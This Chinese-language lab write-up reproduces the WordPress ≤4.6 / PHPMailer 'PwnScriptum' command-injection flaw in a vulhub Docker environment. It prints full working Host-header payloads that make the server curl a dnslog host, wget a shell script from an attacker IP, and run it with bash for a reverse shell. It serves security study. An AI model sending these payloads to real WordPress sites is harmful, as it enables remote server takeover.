Wordpress 4.6 任意命令執行漏洞

Wordpress 4.6 任意命令執行漏洞（PwnScriptum）

當WordPress 使用 PHPMailer 組件向用戶發送郵件。攻擊者在找回密碼時會使用PHPmailer發送重置密碼的郵件,利用substr(字符串截取函數)、$run(系統調用函數)等構造payload，即可進行遠程命令執行。

---

漏洞環境

我們先下載環境，在github有別人直接搭建好的docker環境我們直接拿來用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/wordpress/pwnscriptum/
docker-compose up -d

訪問IP:8080/即可看到一個wordpress安裝界面頁面。

---

影響版本

WordPress <= 4.6.0

PHPMailer < 5.2.18

---

漏洞復現

然后跟着默認下一步安裝即可

漏洞在找回密碼的頁面,這是測試是否存在的payload，里面的user_login為你自己設置存在的賬號,由於有些字符不能用，我們用${substr{0}{1}{$spool_directory}}代替/,${substr{10}{1}{$tod_log}}代替空格

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}wb5hh4.dnslog.cn}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin@qq.com

執行后發現dnslog接收，證明命令執行成功漏洞存在

開啟一個web服務存放反彈shell腳本

執行payload使目標服務器下載這個腳本

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}IP地址${substr{0}{1}{$spool_directory}}edi.txt}} null	)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://192.168.200.23:8080
Connection: close
Referer: http://192.168.200.23:8080/wp-login.php?action=lostpassword
Cookie: ECS[visit_times]=9; wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

user_login=admin%40qq.com&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

web服務監聽80發現腳本被人訪問，上面的命令執行成功

服務器監聽1234端口

發送payload使目標服務器執行腳本

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://192.168.200.23:8080
Connection: close
Referer: http://192.168.200.23:8080/wp-login.php?action=lostpassword
Cookie: ECS[visit_times]=9; wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

user_login=admin%40qq.com&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

反彈shell成功